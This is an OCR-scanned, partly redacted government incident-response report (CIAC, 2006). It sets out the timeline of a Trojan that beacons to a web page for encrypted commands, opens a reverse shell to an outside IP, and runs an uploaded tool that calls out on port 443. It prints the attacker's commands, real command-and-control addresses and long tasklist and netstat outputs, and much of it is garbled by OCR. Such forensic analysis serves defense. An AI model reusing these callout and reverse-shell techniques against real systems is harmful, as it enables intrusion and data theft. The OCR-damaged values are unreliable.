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Timeline 
(EST) 



Activity 



7:27 am 



Attacker changes command on /C0927/Energy.htm to 
WSOGnRy5ny.5pp5plGpRpR. Attacker awaits beacon. 



8:31 am 



Trojan beacons out for /C0927/Energy.htm, hosted on hvmetal.com. Web 
server returns page with new command. Trojan receives new command: 
WSOGnRy5ny.5pp5pIGpR.pR and decrypts it to N:203.239.88.85.8080. 
This tells Trojan to establish reverse shell to 203.239.88.85 on port 8080. 



8:32 am 



One minute later, Trojan initiates reverse shell to 203.239.88.85 on port 
8080. Communication between 198.76.2.7 and 203.239.88.85 established. 
Attacker now has access to 198.76.2.7. Communication is encrypted for 
obscurity by XORing using 3F as encryption key. 



Attacker then runs the following commands on 1 98.76.2.7, remotely and 
in succession: 



He displays a list of applications and associated processes currently 

running on system: 

C:\WINDOWSVsystem32>tasklist 



Image Name 



PID Session Name Session# Mem Usage 



System Idle Process 





Console 





16K 


System 


4 


Console 





212 K 


smss.exe 


1076 


Console 





384 K 


csrss.exe 


1140 


Console 





3,300 K 


winlogon.exe 


1164 


Console 





9,688 K 


services.exe 


1208 


Console 





3,948 K 


lsass.exe 


1220 


Console 





6,108 K 


svchost.exe 


1388 


Console 





4,408 K 


svchost.exe 


1456 


Console 





3,888 K 


svchost.exe 


1544 


Console 





20.696 K 
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svchost.exe 


1608 


Console 





3,040 K 


svchost.exe 


1672 


Console 





4,200 K 


ccEvtMgr.exe 


1828 


Console 





2,740 K 


ccSetMgr.exe 


1844 


Console 





3,976 K 


SNDSrvc.exe 


1868 


Console 





1 ,648 K 


spoolsv.exe 


136 


Console 





4,284 K 


ciient32.exe 


336 


Console 





4992 K 


CTsvcCDA.EXE 


440 


Console 





1,196 K 


DefWatch.exe 


460 


Console 





3,420 K 


DOEENS_Service.exe 


504 


Console 





8,604 K 


mdm.exe 


548 


Console 





2,820 K 


DNACIient.exe 


568 


Console 





9,020 K 


SavRoam.exe 


752 


Console 





4,376 K 


Rtvscan.exe 


796 


Console 





32,312 K 


MsPMSPSv.exe 


864 


Console 





1 ,404 K 


iexplore.exe 


2292 


Console 





8,652 K 


logon. scr 


3128 


Console 





4,964 K 


Updatasched.exe 


2072 


Console 





1,564 K 


Updatasched.exe 


3320 


Console 





1,340 K 


tasklist.exe 


3212 


Console 





4,096 K 


wmiprvse.exe 


3200 


Console 





5,356 K 



He confirms that two instances of Updatasched.exe are running. Note: 
reference to Updatashced.exe was found this variation of the msecur.dll 
Trojan. 



Attacker then lists active connections on 1 98.76.2.7: 
C:\WINDOWS\system32>netstat -an: 

Active Connections 



Proto 


Local Address 


Foreign Address 


State 


TCP 


0.0.0.0:135 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:445 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:2967 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:5405 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:6001 


0.0,0.0:0 


LISTENING 


TCP 


198.76.2.7:139 


0.0.0.0:0 


LISTENING 


TCP 


198.76.2.7:1093 


203.239.88.85:8080 


ESTABLISHED 


TCP 


198.76.2.7 1122 


203.239,88.85:8080 


ESTABLISHED 


UDP 


0.0.0.0:445 


* 


it 




UDP 


0.0.0.0:500 


* 


* 




UDP 


0.0.0.0:1027 




* 




UDP 


0.0.0.0:4500 


* 






UDP 


0.0.0.0:5405 




* 




UDP 


0.0.0.0:6003 


* 


* 




UDP 


0.0.0.0:58000 


ft 


* 




UDP 


127.0.0.1:123 


* 


* 




UDP 


198.76.2.7:123 


* 


* 
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UDP 198.76.2.7:137 
UDP 198.76.2.7:138 



Attacker confirms that there are two established connections to hostile IP 



Attacker runs a tasklist command again: 
C:\WlNDOWS\svstem32>tasklist 



Image Name 



PID Session Name Session# Mem Usage 



System Idle Process 


Console 





16K 


System 


4 Console 





212 K 


smss.exe 


1076 Console 





384 K 


csrss.exe 


1140 Console 





3,300 K 


winlogon.exe 


1164 Console 





9,688 K 


services.exe 


1208 Console 





3,948 K 


lsass.exe 


1220 Console 





6,108 K 


svchost.exe 


1388 Console 





4,424 K 


svchost.exe 


1456 Console 





3,888 K 


svchost.exe 


1544 Console 





20,876 K 


svchost.exe 


1608 Console 





3,040 K 


svchost.exe 


1672 Console 





4,200 K 


ccEvtMgr.exe 


1828 Console 





2,740 K 


ccSetMgr.exe 


1844 Console 





3,976 K 


SNDSrvc.exe 


1868 Console 





1 ,648 K 


spoolsv.exe 


136 Console 





4,284 K 


client32.exe 


336 Console 





4,992 K 


CTsvcCDA.EXE 


440 Console 





1,196 K 


DefWatch.exe 


460 Console 





3,420 K 


DOEENS_Service.exe 


504 Console 





8,604 K 


mdm.exe 


548 Console 





2,820 K 


DNACIient.exe 


568 Console 





9,020 K 


SavRoam.exe 


752 Console 





4,376 K 


Rtvscan.exe 


796 Console 





32,312 K 


MsPMSPSv.exe 


864 Console 





1,404 K 


iexplore.exe 


2292 Console 





8,652 K 


logon. scr 


3128 Console 





4,964 K 


Updatasched.exe 


2072 Console 





1,564 K 


Updatasched.exe 


3320 Console 





1,344 K 


wmiprvse.exe 


3200 Console 





5,560 K 


tasklist.exe 


3792 Console 





4,096 K 



Official Use Only 



3 



2/22/2006 



Official Use Only 




Computer Incident Advisory Capability (CIAC) 

Office of the Chief Information Officer 

Office of Cyber Security 925-422-81 93 

— aM * B " 1 1-866-901 -CIAC 



He then navigates up one level and down into the help directory: 
C:YWINDOWS\systeni32>cd .Ahelp 



Attacker now is interested in fr.exe and tries to make sure the file exists. 
This is confirmed below: 
C:\WTNDO WS\help>dir fr.exe 

Volume in drive C has no label. 
Volume Serial Number is 88F3-5429 

Directory of C:\WINDOWS\Help 
02/09/2006 08:20 AM 45.056fr.exe 

1 File{s) 45,056 bytes 

Dir(s) 24,998,223,872 bytes free 



:34 am 



Attacker then launches the fr.exe program. From the time stamp above, it 
seems he uploaded fr.exe onto 1 98.76.2.7 around 8:20am. The traffic to 
443 is encrypted with a different XOR key: 
C:\WINDOWS\helpHr 203.239.88.85 443 



Attacker want to know whether the connection attempt worked: 
C:\WINDOWS\help>netstat -an 

Nr IP:203. 239.88. 85 Nr port: 443 
Active Connections 



Proto Local Address 

TCP 0.0.0.0:135 

TCP 0.0.0.0:445 

TCP 0.0.0.0:2967 

TCP 0.0.0.0:5405 

TCP 0.0.0.0:6001 

TCP 198.76.2.7:139 

TCP 198.76.2.7:1093 

TCP 198.76.2.7:1122 

TCP 198.76.2.7:1123 

UDP 0.0.0.0:445 



Foreign Address 
0.0.0.0:0 
0.0.0.0:0 
0.0.0.0:0 
0.0.0.0:0 
0.0.0.0:0 

0.0.0.0:0 
203.239.88.85:8080 
203.239.88.85:8080 

203.239.88.85:443 



State 

LISTENING 

LISTENING 

LISTENING 

LISTENING 

LISTENING 

LISTENING 

ESTABLISHED 

ESTABLISHED 

SYN SENT 
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UDP 0.0.0.0:500 

UDP 0.0.0.0:1027 

UDP 0.0.0.0:4500 

UDP 0.0.0.0:5405 

UDP 0.0.0.0:6003 

UDP 0.0.0.0:58000 

UDP 127.0.0.1:123 

UDP 198.76.2.7:123 

UDP 198.76.2.7:137 

UDP 198.76.2.7:138 



He makes sure that fr.exe really kicked off: 
C:\WINDOWS\hclp>tasklist 

Image Name PID Session Name Session* Mem Usage 



System Idle Process 


Console 





16 K 


System 


4 Console 





212 K 


smss.exe 


1076 Console 





384 K 


csrss.exe 


1140 Console 





3,308 K 


winlogon.exe 


1164 Console 





9,692 K 


services.exe 


1208 Console 





3,948 K 


lsass.exe 


1220 Console 





6,112 K 


svchost.exe 


1388 Console 





4,424 K 


svchost.exe 


1456 Console 





3,896 K 


svchost.exe 


1544 Console 





20,864 K 


svchost.exe 


1608 Console 





3,040 K 


svchost.exe 


1672 Console 





4,200 K 


ccEvtMgr.exe 


1828 Console 





2,740 K 


ccSetMgr.exe 


1844 Console 





3,976 K 


SNDSrvc.exe 


1868 Console 





1,648 K 


spoolsv.exe 


136 Console 





4,284 K 


ciient32.exe 


336 Console 





4,992 K 


CTsvcCDA.EXE 


440 Console 


.0 


1,196 K 


DefWatch.exe 


460 Console 





3,420 K 


DOEENS Service.exe 504 Console 





8,604 K 


mdm.exe 


548 Console 





2,828 K 


DNACIient.exe 


568 Console 





9,020 K 


SavRoam.exe 


752 Console 





4,376 K 


Rtvscan.exe 


796 Console 





32,312 K 


MsPMSPSv.exe 


864 Console 





1 ,404 K 


iexplore.exe 


2292 Consoie 





8,652 K 


logon, scr 


3128 Console 





4,964 K 


Updatasched.exe 


2072 Console 





1,564 K 


Updatasched.exe 


3320 Console 





1,532 K 


fr.exe 


3848 Console 





1,544 K 



Official Use Only 



5 



2/22/2006 



Official Use Only 




uCt'ARfHtcif Of £ N £ H it 
K Office- of the Chief Information Officer 
B»v Office of Cyber Security 



Computer Incident Advisory Capability (CIAC) 

925-422-8193 
1-866-901-CIAC 



**MtMfl Off 



tasklist.exe 
wmiprvse.exe 



3964 Console 
1408 Console 



4,096 K 
5,356 K 



Attacker is apparently finished with the port 443 connection. He tries to 
stop the fr.exe process using tskill along with the process' ID. Access was 
denied however: 

C:\WINDOWS\helpWskill 3848 

End process failed for 3848: access is denied 



He lists the tasks once, and apparently, fr.exe is no longer a running 
process: 

C:\WINDOWS\hclp>tasklist 

Image Name PID Session Name Session* Mem Usage 



System Idle Process 


Console 





16 K 


System 


4 Console 





212 K 


smss.exe 


1076 Console 





384 K 


csrss.exe 


1140 Console 





3,300 K 


winlogon.exe 


1164 Console 





9,692 K 


services.exe 


1208 Console 





3,948 K 


lsass.exe 


1220 Console 





6,112 K 


svchost.exe 


1388 Console 





4,488 K 


svchost.exe 


1456 Console 





3,888 K 


svchost.exe 


1544 Console 





20,740 K 


svchost.exe 


1608 Console 





3,040 K 


svchost.exe 


1672 Console 





4,200 K 


ccEvtMgr.exe 


1828 Console 





2,740 K 


ccSetMgr.exe 


1844 Console 





3,976 K 


SNDSrvc.exe 


1868 Console 





1,648 K 


spoolsv.exe 


136 Console 





4,284 K 


client32.exe 


336 Console 





4,992 K 


CTsvcCDA.EXE 


440 Console 





1,196 K 


DefWatch.exe 


460 Console 





3,420 K 


DOEENS_Service.exe 


504 Console 





8,604 K 


mdm.exe 


548 Console 





2,828 K 


DNACIient.exe 


568 Console 





9,020 K 


SavRoam.exe 


752 Console 





4,376 K 
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Rtvscan.exe 


796 Console 





32,312 K 


MsPMSPSv.exe 


864 Console 





1 ,404 K 


iexplore.exe 


2292 Console 





8.652 K 


logon. scr 


3128 Console 





4,964 K 


Updatasched.exe 


2072 Console 





1,564 K 


Updatasched.exe 


3320 Console 





1,536 K 


taskltst.exe 


3192 Console 





4,096 K 


wmiprvse.exe 


4044 Console 





5,356 K 



He then deletes fr.exe 
C:\WINDOWS\help>del fr.exe 



Moving on, lie lists the entire contents of the help directory. Apparently, 
he is interested in the existence of a few files or directories: 
C:\WINDGWS\help>dir 

[-] 



07/17/2002 


04 


32 


AM 


24,567 regopt.chm 


07/17/2002 


04 


33 


AM 


33,427 hschelp.chm 


07/17/2002 


04 


33 


AM 


24,285 input.hlp 


07/17/2002 


04 


33 


AM 


15,071 hardware.hlp 


11/04/2002 


06: 


02 


PM 


613,334 wmplayer.chm 


12/11/2002 


11; 


14 


PM 


24,759 dxdiag.chm 


05/02/2003 


02: 


19 


PM 


23,662 nvwcppt.hlp 


05/02/2003 


02: 


19 


PM 


23,494 nvwcpptb.hlp 


05/02/2003 


02 


19 


PM 


24,149 nvwcpru.hlp 


05/02/2003 


02: 


19 


PM 


23,937 nvwcppl.hlp 


05/02/2003 


02: 


19 


PM 


22,919 nvwcpno. hip 


05/02/2003 


02 


19 


PM 


23,097 nvwcpnl.hlp 


05/02/2003 


02: 


19 


PM 


22,977 nvwcplen.hlp 


05/02/2003 


02: 


19 


PM 


33,084 nvwcpko.hlp 


05/02/2003 


02; 


19 


PM 


32,944 nvwcpja.hlp 


05/02/2003 


02 


19 


PM 


23,297 nvwcpit.hlp 


05/02/2003 


02: 


19 


PM 


26,819 nvwcphu.hlp 


05/02/2003 


02: 


19 


PM 


24,389 nvwcpsk.hlp 


05/02/2003 


02: 


19 


PM 


23,449 nvwcphe.hlp 


05/02/2003 


02: 


19 


PM 


23,262 nvwcpfr.hlp 
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05/02/2003 02:19 PM 23,322 nvwcpfi. hip 

05/02/2003 02:19 PM 21,907 nvwcpesm.hlp 

05/02/2003 02:19 PM 21,880 nvwcpes. hip 

05/02/2003 02:19 PM 23,455 nvwcpsl. hip 

05/02/2003 02:19 PM 23,253 nvwcpsv.hlp 

05/02/2003 02:19 PM 20,453 nvwcpeng. hip 

05/02/2003 02:19 PM 25,634 nvwcptr.hip 

05/02/2003 02:19 PM 24,1 55 nvwcpde.hlp 

05/02/2003 02:19 PM 23,275 nvwcpda.hlp 

05/02/2003 02:19 PM 24,777 nvwcpes. hip 

05/02/2003 02:19 PM 22,833 nvwcpar.hlp 

05/02/2003 02:19 PM 64,921 nvcpzht.hlp 

05/02/2003 02:19 PM 65,219 nvcpzhc.hlp 

05/02/2003 02:19 PM 60,678 nvcptr.hlp 

05/02/2003 02:19 PM 72,751 nvepth, hip 

05/02/2003 02:19 PM 54,457 nvcpsv.hlp 

05/02/2003 02:19 PM 55,756 nvcpsl. hip 

05/02/2003 02:19 PM 86,673 nvcpsk.hlp 

05/02/2003 02:19 PM 57,406 nvepru. hip 

05/02/2003 02:19 PM 53,767 nvepptb. hip 

05/02/2003 02:19 PM 53,072 nvcppt.hlp 

05/02/2003 02:19 PM 57,780 nvcppl. hip 

05/02/2003 02:19 PM 54,358 nvcpno.hlp 

05/02/2003 02:19 PM 53,770 nvcpn I. hip 

05/02/2003 02:19 PM 50,792 nvcpl. hip 

05/02/2003 02:19 PM 33,425 nvwepth. hip 

05/02/2003 02:19 PM 87,057 nvcpko, hip 

05/02/2003 02:19 PM 80,143 nvepja. hip 

05/02/2003 02:19 PM 53,182 nvcpit.hlp 

05/02/2003 02:19 PM 58,809 nvephu. hip 

05/02/2003 02:19 PM 78,982 nvephe. hip 

05/02/2003 02:19 PM 54,995 nvcpfr, hip 

05/02/2003 02:19 PM 55,946 nvepfi. hip 

05/02/2003 02:19 PM 53,497 nvepesm. hip 

05/02/2003 02:19 PM 24,017 nvwcpel. hip 

05/02/2003 02:19 PM 52,949 nvepes. hip 

05/02/2003 02:19 PM 50,690 nvepeng. hip 

05/02/2003 02:19 PM 56,41 5 nvcpde.hlp 

05/02/2003 02:19 PM 54,358 nvepda. hip 

05/02/2003 02:19 PM 26,920 nvwepzht. hip 

05/02/2003 02:19 PM 77,671 nvcpar.hlp 

05/02/2003 02:19 PM 85,508 nvepes. hip 
07/25/2003 10:07 AM <DlR> Tours 

07/28/2003 12:31 PM 1 1,403 javaperm. hip 

07/28/2003 12:31 PM 21,444 javasec. hip 
07/28/2003 12:41 PM <DIR> mui 

06/25/2004 12:19 AM 56,388 mswmc.chm 

07/17/2004 10:33 AM 269,916 comexp.chm 

07/17/2004 10:35 AM 38,132 iis.chm 

07/17/2004 10:36 AM 488,023 msmqconcepts.chm 

07/17/2004 10:39 AM 253,201 msoe.chm 

07/17/2004 10:40 AM 204,81 iexplore.chm 



Official Use Only 



2/22/2006 



Official Use Only 




S££ t£, ,JLL^ Computer Incident Advisory Capability (Ci AC) 

OWc. o, Cytxar Security 925-422-81 93 

- ci AC 1-866-901-CIAC 

I oor in*'** 



07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:40 AM 

07/17/2004 10:43 AM 

07/17/2004 09:54 PM 

07/17/2004 09:54 PM 

07/17/2004 09:54 PM 

07/17/2004 09:54 PM 

07/17/2004 09:54 PM 

07/17/2004 09:54 PM 

07/17/2004 09:54 PM 

07/17/2004 09:54 PM 

08/03/2004 11:56 PM 

08/03/2004 11:56 PM 

08/03/2004 11:56 PM 

08/04/2004 12:02 AM 

08/04/2004 12:02 AM 

02/18/2005 03:23 PM 



22,21 9 atm. dim 
18,855 datetime.chm 
64,768 evconcepts.chm 
48,179 howto.chm 
77,945 filefold.chm 
32,171 hardware.chm 
48,494 file_srv.chm 
54,004 dskquoui.chm 
219,609 ipsecconcepts.chm 
32,564 license.chm 
154,065 ipv6.chm 
44,271 msinfo32.chm 
37,31 8 mstask.chm 
67,569 mstsc.chm 
56,768 mode.chm 
79,196 misc.chm 
111,575 network.chm 
535,789 netcfg.chm 
20,257 ntchowto.chm 
81,426 ntdef.chm 
271,333 nusrmgr.chm 
21,891 password. chrn 
98,833 printing. chm 
45,830 rsop.chm 
35,052 rdesktop.chm 
20,126 remasst.chm 
119,885 spolsconcepts.chm 
17,304 sr_ui.chm 
20,233 spad.chm 
202,413 spconcepts.chm 
18,379 sendcmsg.chm 
35,403 sysrestore.chm 
32,400 sys_srv.chrn 
16,643 webpub.chm 
45,068 twclient. chm 
12,488 twclient.hlp 
46,130 wschelp.chm 
50,059 blutooth.chm 
1,104,994 windows. chq 
20,170 wuau.chm 
22,555 conflchm 

61.279 updatel.chm 
165.024 inetres.chm 
23,195 wmplay.chm 
376,086 cpanel.chq 
462,338 system.chm 
34,816 sniffpol.dll 

33.280 sstub.dll 
279,040 tshoot.dl! 

79,996 apps.chm 
299,152 apps_sp.crim 

5,058 hhcolreg.dat 
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05/26/2005 04:16 AM 
09/29/2005 11:19 AM 
09/29/2005 12:26 PM 
02/09/2006 08:38 AM 
02/09/2006 08:38 AM 
440 File(s) 



74,909 wuauhelp.chm 

6.416 hlp.hlp 
<DIR> mail 
<DIR> 
<DIR> 
26,743,239 bytes 



5 Dir(s) 24,998,252,544 bytes free 



From the creation date of the mail directory above, we can see that it was 
uploaded around the same time wauserv.dll and vvbc.exe was used to 
exfiltrate data from DOE HQ. He changes into the mail directory... 
C:YWINDOWS\help>cd mail 

... and does a directory list of the directory. Everything seems intact: 
C:\WINDO\VS\help\mail>dir 

Volume in drive C has no label. 
Volume Serial Number is 88F3-5429 

Directory of C:\WINDOWS\Help\mail 



09/29/2005 
09/29/2005 
07/17/2004 
07/17/2004 



12:26 PM 
12:26 PM 
10:36 AM 
10:36 AM 



<DIR> 
<DIR> 



2 File(s) 



354 smtpsnap.cnt 
72,347 smtpsnap.hlp 
72,701 bytes 



2 Dir(s) 24,998,252,544 bytes free 



Finally, he issues some sort of sleep command 

C:\W1N DOWS\heIp\mail> sleep 10 Sleep Time (*10m):10 



8:38 am 



Communication on port 443 ends 

We are yet to decipher the communication that took place on port 443 



8:40 am 



Communication on port 8080 ends. 



8:44 am 



Attacker resets command on /C0927/Energy.htm to WSFGcne5R5R5cG7. 
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V<*£« & WAL,^ ~ Computer Incident Advisory Capability (CIAC) 

w^f 925-422-8193 
e/^c- 1-866-901 -CIAC 




1 1:58 am 



Trojan beacons out for Energy.htm. Web server returns page with new 
comman, Trojan receives new command: WSFGcne5R5R5cG7. Trojan 
sent back to sleep 



* if * H= ****************************** #jsj * ^ 



1 his particular attack was initially discovered nylOItlllS] | 9SI 


5 


) J 


[0109 |- as well as initial analysis, was provided b y [0IdI(Sfl 


— 




J. The 


MDMEM | was provided by [j 


|(b) (7)(C) J 


[0] fflof the IARC is currently working on an [01QB 









For questions regarding this document, please contact 



(b) (7)(C) 



Official Use Only 



11 



2/22/2D06 



